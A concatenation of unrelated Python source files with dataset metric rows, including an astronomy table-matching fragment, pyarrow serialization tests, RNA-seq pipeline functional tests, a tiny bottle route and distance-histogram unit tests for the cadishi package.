elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
else:
arr2=np.ones([10, 2])
arr2=np.array(arr2)
return arr2[:,0], arr2[:,1]
def inv_tl_arr_crt(n, par):
a1=np.loadtxt('../files/lira_tab.tex', dtype='string', delimiter='&')
arr2=[]
print par
if par[0] == 't':
ff=np.loadtxt('../files/mod_tabJ-exp.tex', dtype='string', delimiter='&')
for i in a1:
try:
if i[0][:-1]+' ' in ff[:,0]:
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6])])
elif i[0][:-2]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-2]+' '][0][n][1:-1]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-2]+' '][0][n][2:6])])
except:
i[0]
elif par == 'Dm15':
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#arr2=[]
for i in a1:
try:
#print i[0], dm[0][0]
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
arr2=np.array(arr2)
return arr2[:,1], arr2[:,0]
| 23.562353 | 154 | 0.518574 | 2,009 | 10,014 | 2.561971 | 0.087606 | 0.035749 | 0.030309 | 0.025257 | 0.782009 | 0.779289 | 0.763552 | 0.749174 | 0.741986 | 0.73538 | 0 | 0.098602 | 0.18574 | 10,014 | 424 | 155 | 23.617925 | 0.532622 | 0.121929 | 0 | 0.619658 | 0 | 0 | 0.088846 | 0.048693 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008547 | null | null | 0.021368 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbcdfb3cbffcd1ed9aff848124c9ca5c31b617cf | 1,522 | py | Python | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 167 | 2017-03-23T22:16:58.000Z | 2022-03-08T09:19:30.000Z | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 93 | 2017-03-23T22:11:40.000Z | 2021-12-13T18:38:53.000Z | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 46 | 2017-03-25T19:12:14.000Z | 2021-08-15T18:04:29.000Z | import numpy as np
import pyarrow as pa
from ..context import serialization_context
def test_numpy_masked_array_serialization():
arr = np.array([1, 2, 3, 4])
arr_mask = np.array([True, False, True, False])
masked_arr = np.ma.masked_array(arr, arr_mask)
serialized_masked_arr = pa.serialize(masked_arr, context=serialization_context)
deserialized_masked_arr = pa.deserialize(
serialized_masked_arr.to_buffer(), context=serialization_context
)
np.testing.assert_array_equal(deserialized_masked_arr, masked_arr)
def test_numpy_masked_array_serialization_nomask():
arr = np.array([1, 2, 3, 4])
arr_mask = np.ma.nomask
masked_arr = np.ma.masked_array(arr, arr_mask)
serialized_masked_arr = pa.serialize(masked_arr, context=serialization_context)
deserialized_masked_arr = pa.deserialize(
serialized_masked_arr.to_buffer(), context=serialization_context
)
np.testing.assert_array_equal(deserialized_masked_arr, masked_arr)
def test_numpy_masked_constant_serialization():
constant = np.ma.masked
serialized = pa.serialize(constant, context=serialization_context)
deserialized = pa.deserialize(serialized.to_buffer(), context=serialization_context)
assert deserialized is np.ma.masked
def test_python_slice_serialization():
s = slice(1, 2, 3)
serialized = pa.serialize(s, context=serialization_context)
deserialized = pa.deserialize(serialized.to_buffer(), context=serialization_context)
assert deserialized == s
| 33.822222 | 88 | 0.763469 | 198 | 1,522 | 5.560606 | 0.186869 | 0.114441 | 0.196185 | 0.141689 | 0.773842 | 0.773842 | 0.724796 | 0.724796 | 0.724796 | 0.724796 | 0 | 0.008462 | 0.145861 | 1,522 | 44 | 89 | 34.590909 | 0.838462 | 0 | 0 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 1 | 0.129032 | false | 0 | 0.096774 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
916b91f2bd98059ebb1ddf4b1b542ffe4e5a9db4 | 18,036 | py | Python | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 59 | 2018-05-02T15:04:26.000Z | 2022-03-30T20:26:47.000Z | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 51 | 2018-05-07T17:45:28.000Z | 2022-03-29T17:13:42.000Z | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 18 | 2018-05-07T17:40:23.000Z | 2021-12-14T04:18:24.000Z |
__author__ = "Timothy Tickle"
__copyright__ = "Copyright 2015"
__credits__ = ["Timothy Tickle", "Brian Haas"]
__license__ = "MIT"
__maintainer__ = "Timothy Tickle"
__email__ = "ttickle@broadinstitute.org"
__status__ = "Development"
import Commandline
import os
import ParentPipelineTester
import unittest
class FunctionalTester(ParentPipelineTester.ParentPipelineTester):
"""
Functional testing for scripts, these are focused on making sure the script can be called in different ways and complete without error.
"""
# Testing environment
str_script_dir = "/ahg/regev/users/ttickle/dev/Trinity_CTAT/mutation/src"
str_test_data = "/seq/RNASEQ/public_ftp/CTAT/mutation/demo_data"
str_testing_area = "/broad/hptmp/ttickle/active_testing_script_tester"
os.environ['PATH'] = ":".join([str_script_dir,os.getenv('PATH',None)])
str_input_index = os.path.join(str_test_data, "Hg19_11")
str_input_test_bam = os.path.join(str_test_data, "Aligned.sortedByCoord.out.bam")
str_left_file = os.path.join(str_test_data, "FLI1.left.fq")
str_right_file = os.path.join(str_test_data, "FLI1.right.fq")
str_reference_vcf = os.path.join(str_test_data, "dbsnp_FLI1.vcf")
str_reference_genome = os.path.join(str_test_data, "Hg19_11.fa")
str_update_command = "".join(["--update AddOrReplaceReadGroups.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"MarkDuplicates.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"SortSam.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"snpEff.jar",
":/seq/regev_genome_portal/SOFTWARE/snpEff,",
"GenomeAnalysisTK.jar",
":/humgen/gsa-hpprojects/GATK/bin/GenomeAnalysisTK-3.1-1-g07a4bf8"])
def test_rnaseq_mutation_pipeline_for_no_args(self):
"""
Tests rnaseq_mutation_pipeline.py for no args call.
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertFalse(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_args_short(self):
"""
Tests rnaseq_mutation_pipeline.py for help args call short.
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py -h"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_args_long(self):
"""
Tests rnaseq_mutation_pipeline.py for help args call short.
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py --help"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_test(self):
"""
Tests rnaseq_mutation_pipeline.py for test mode.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--test",
"--out_dir", "_".join([self.str_testing_area,"vanilla_test"]),
"--vcf",self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_gatk_call(self):
"""
Tests rnaseq_mutation_pipeline.py for gatk call.
"""
str_output_dir = os.path.join(self.str_testing_area,"vanilla_gatk")
self.func_make_dummy_dirs([self.str_testing_area, str_output_dir])
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--variant_filtering_mode GATK",
"--out_dir",
str_output_dir,
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_compression(self):
"""
Tests rnaseq_mutation_pipeline.py for compression.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right",self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_compression"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--compress","archive"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_clean(self):
"""
Tests rnaseq_mutation_pipeline.py for clean.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_clean"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--clean"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_archive(self):
"""
Tests rnaseq_mutation_pipeline.py for archive.
"""
# Create test environment
str_copy_dir = os.path.join(self.str_testing_area, "copy_test_runs")
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_archive"]),
"--vcf",self.str_reference_vcf, self.str_update_command,
"--copy", str_copy_dir])
# Run command
if not os.path.exists(str_copy_dir):
os.mkdir(str_copy_dir)
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_realign(self):
"""
Tests rnaseq_mutation_pipeline.py for realignment.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_realign"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--realign"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_starting_with_bam(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a bam.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right",self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_bam"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--bam", self.str_input_test_bam])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_star_limited(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with start limited mode
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode LIMITED",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_limited"]),
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_named_log_file(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a named log file.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_samtools"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--log", os.path.join("_".join([self.str_testing_area,"vanilla_log"]),"run.log")])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_starting_with_premade_index(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a premade index
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_premade_index"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--index", self.str_input_index])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_no_recalibration(self):
"""
Tests rnaseq_mutation_pipeline.py for no recalibration
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_no_recal"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--recalibrate_sam"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_move(self):
"""
Tests rnaseq_mutation_pipeline.py for moving files
"""
# Create test environment
str_move_dir = os.path.join(self.str_testing_area, "move_test_runs")
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_no_move"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--move", str_move_dir])
# Run command
if not os.path.exists(str_move_dir):
os.mkdir(str_move_dir)
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_no_filtering(self):
"""
Tests rnaseq_mutation_pipeline.py for a run with no filtering.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--variant_filtering_mode NONE",
"--out_dir", "_".join([self.str_testing_area,"vanilla_samtools"]),
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
# Creates a suite of tests
def suite():
return unittest.TestLoader().loadTestsFromTestCase(FunctionalTester)
| 48.353887 | 139 | 0.505877 | 1,669 | 18,036 | 5.095866 | 0.107849 | 0.069136 | 0.124162 | 0.0903 | 0.805409 | 0.805409 | 0.792593 | 0.754733 | 0.702058 | 0.649148 | 0 | 0.003207 | 0.394821 | 18,036 | 372 | 140 | 48.483871 | 0.775996 | 0.101686 | 0 | 0.657258 | 0 | 0 | 0.188166 | 0.062595 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.068548 | false | 0 | 0.016129 | 0.004032 | 0.133065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
918d4f88f8103336b675ac0309ca7e38d523f323 | 86 | py | Python | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | from bottle import get, template
@get('/')
def index():
return template("index")
| 14.333333 | 32 | 0.662791 | 11 | 86 | 5.181818 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174419 | 86 | 5 | 33 | 17.2 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
37e6924d8fd2d8d6ad34093d98ec71bbad4fd1ac | 67 | py | Python | tensor_rnn/modules/composite/__init__.py | arkmagus/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | 18 | 2018-03-30T12:39:11.000Z | 2021-07-16T05:10:42.000Z | tensor_rnn/modules/composite/__init__.py | androstj/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | null | null | null | tensor_rnn/modules/composite/__init__.py | androstj/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | 5 | 2018-09-28T08:51:54.000Z | 2021-04-08T08:05:44.000Z | from .cprnn import *
from .tuckerrnn import *
from .ttrnn import *
| 16.75 | 24 | 0.731343 | 9 | 67 | 5.444444 | 0.555556 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 25 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5328ab30925df40744601061cd773028f759191e | 26,837 | py | Python | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
] | 14 | 2017-08-22T13:00:42.000Z | 2021-11-19T14:07:55.000Z | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
] | 1 | 2021-11-19T14:07:38.000Z | 2021-11-19T14:07:38.000Z | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
] | null | null | null | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# Cadishi --- CAlculation of DIStance HIstograms
#
# Copyright (c) Klaus Reuter, Juergen Koefinger
# See the file AUTHORS.rst for the full list of contributors.
#
# Released under the MIT License, see the file LICENSE.txt.
"""A set of unit tests for the pydh CPU and cudh GPU histogram modules.
"""
from __future__ import print_function
from builtins import str
from builtins import range
import os
import sys
import numpy as np
import glob
import math
import multiprocessing
import pytest
from cadishi import util
# --- select the modules to be tested via environment variables
TEST_PYDH = bool(int(os.environ.get("TEST_PYDH", "1")))
TEST_CUDH = bool(int(os.environ.get("TEST_CUDH", "0")))
# --- toggle large test case which may take a long time
TEST_LARGE = bool(int(os.environ.get("TEST_LARGE", "0")))
# --- toggle extra-large test case which may take even longer
TEST_XLARGE = bool(int(os.environ.get("TEST_XLARGE", "0")))
# --- dump the histograms from the medium and large problem sets for manual inspection
DUMP_DATA = bool(int(os.environ.get("DUMP_DATA", "0")))
# --- global variables ---
# r_max, coordinates are in a unit box
r_max = math.sqrt(3.0)
# --- set up the number of threads to be tested, depending on the machine
n_cores = multiprocessing.cpu_count()
n_threads = [1]
while (n_threads[-1] < n_cores):
n_threads.append(2 * n_threads[-1])
if (n_threads[-1] > n_cores):
n_threads.pop()
n_threads.remove(1)
print("n_threads = " + str(n_threads))
# --- import the dist module which serves as the reference implementation
from cadishi.kernel import dist
# --- import the pydh module
from cadishi.kernel import pydh
# --- import the cudh module
if TEST_CUDH:
try:
from cadishi.kernel import cudh
except Exception as e:
print("Error importing >> cudh <<. Disabling CUDA tests.")
print("Exception message : " + e.message)
TEST_CUDH = False
if TEST_CUDH:
# test if we are able to run the tests at all
if (cudh.get_num_devices() == 0):
print("No usable CUDA device detected. Disabling CUDA tests.")
TEST_CUDH = False
else:
print("CUDA tests: " + str(cudh.get_num_devices()) + " GPUs detected.")
def get_triclinic_box():
"""Return an (arbitrarily defined) triclinic box."""
return np.asarray([0.66, 0.75, 0.88, 33., 45., 66.])
def get_orthorhombic_triclinic_box():
"""Return an (arbitrarily defined) orthorhombic box (using a triclinic specifier)."""
return np.asarray([0.66, 0.75, 0.88, 90., 90., 90.])
def get_orthorhombic_box():
"""Return an (arbitrarily defined) orthorhombic box."""
box = np.zeros((3, 3))
box[0][0] = 0.66
box[1][1] = 0.75
box[2][2] = 0.88
return box
testcase_small = None
@pytest.fixture
def fixture_small():
"""Create a reference case using the very first dist implementation."""
global testcase_small
if testcase_small is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
histo = dist.histograms(coords, r_max, n_bins)
# if DUMP_DATA:
# file_name = sys._getframe().f_code.co_name + ".dat"
# util.dump_histograms(file_name, histo, r_max, n_bins)
testcase_small = (n_atoms, n_bins, coords, histo)
return testcase_small
testcase_small_orthorhombic = None
@pytest.fixture
def fixture_small_orthorhombic():
"""Create a orthorhombic reference case in double precision using pydh."""
global testcase_small_orthorhombic
if testcase_small_orthorhombic is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
box = get_orthorhombic_box()
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="double", n_threads=1)
testcase_small_orthorhombic = (n_atoms, n_bins, coords, box, histo)
return testcase_small_orthorhombic
testcase_small_triclinic = None
@pytest.fixture
def fixture_small_triclinic():
"""Create a triclinic reference case in double precision using pydh."""
global testcase_small_triclinic
if testcase_small_triclinic is None:
n_atoms = [2847, 3918]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms)
box = get_triclinic_box()
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="double", n_threads=1)
testcase_small_triclinic = (n_atoms, n_bins, coords, box, histo)
return testcase_small_triclinic
if TEST_PYDH:
def test_pydh_small_double_blocked(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_blocked = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, blocksize=200, check_input=check_input)
util.compare(histo_ref, histo_blocked)
def test_pydh_small_double(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_n_threads_small_double(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_small_single(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_small_single(fixture_small):
"""Test if pydh gives the same answer as dist()."""
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_small_orthorhombic_single(fixture_small_orthorhombic):
"""Test if the orthorhombic implementation gives the same answer in single precision."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_orthorhombic
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_pydh_small_triclinic_single(fixture_small_triclinic):
"""Test if the triclinic implementation gives the same answer in single precision."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
for check_input in [True, False]:
histo = pydh.histograms(coords, r_max, n_bins, box=box, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo)
def test_pydh_small_orthorhombic_triclinic(fixture_small_triclinic):
"""Test if the triclinic and orthorhombic implementations give the same answer for an orthorhombic box."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
box_ort = get_orthorhombic_box()
box_tri = get_orthorhombic_triclinic_box()
for precision in ['single', 'double']:
for check_input in [True, False]:
histo_ort = pydh.histograms(coords, r_max, n_bins, box=box_ort, force_triclinic=False,
precision=precision, n_threads=1, check_input=check_input)
histo_tri = pydh.histograms(coords, r_max, n_bins, box=box_tri, force_triclinic=True,
precision=precision, n_threads=1, check_input=check_input)
util.compare(histo_ort, histo_tri)
if TEST_CUDH:
def test_cudh_small_double(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_single(fixture_small):
n_atoms, n_bins, coords, histo_ref = fixture_small
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_orthorhombic(fixture_small_orthorhombic):
"""Check if pydh and cudh give the same answer with orthorhombic boxes."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_orthorhombic
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, box=box, precision=precision,
check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_triclinic(fixture_small_triclinic):
"""Check if pydh and cudh give the same answer with triclinic boxes."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo = cudh.histograms(coords, r_max, n_bins, box=box, precision=precision,
check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo)
def test_cudh_small_orthorhombic_triclinic(fixture_small_triclinic):
"""Test if the triclinic and orthorhombic implementations give the same answer for an orthorhombic box."""
n_atoms, n_bins, coords, box, histo_ref = fixture_small_triclinic
box_ort = get_orthorhombic_box()
box_tri = get_orthorhombic_triclinic_box()
for precision in ['single', 'double']:
for check_input in [True, False]:
for algo in [1, 2, 3]:
histo_ort = cudh.histograms(coords, r_max, n_bins, box=box_ort, force_triclinic=False,
precision=precision, check_input=check_input, algorithm=algo)
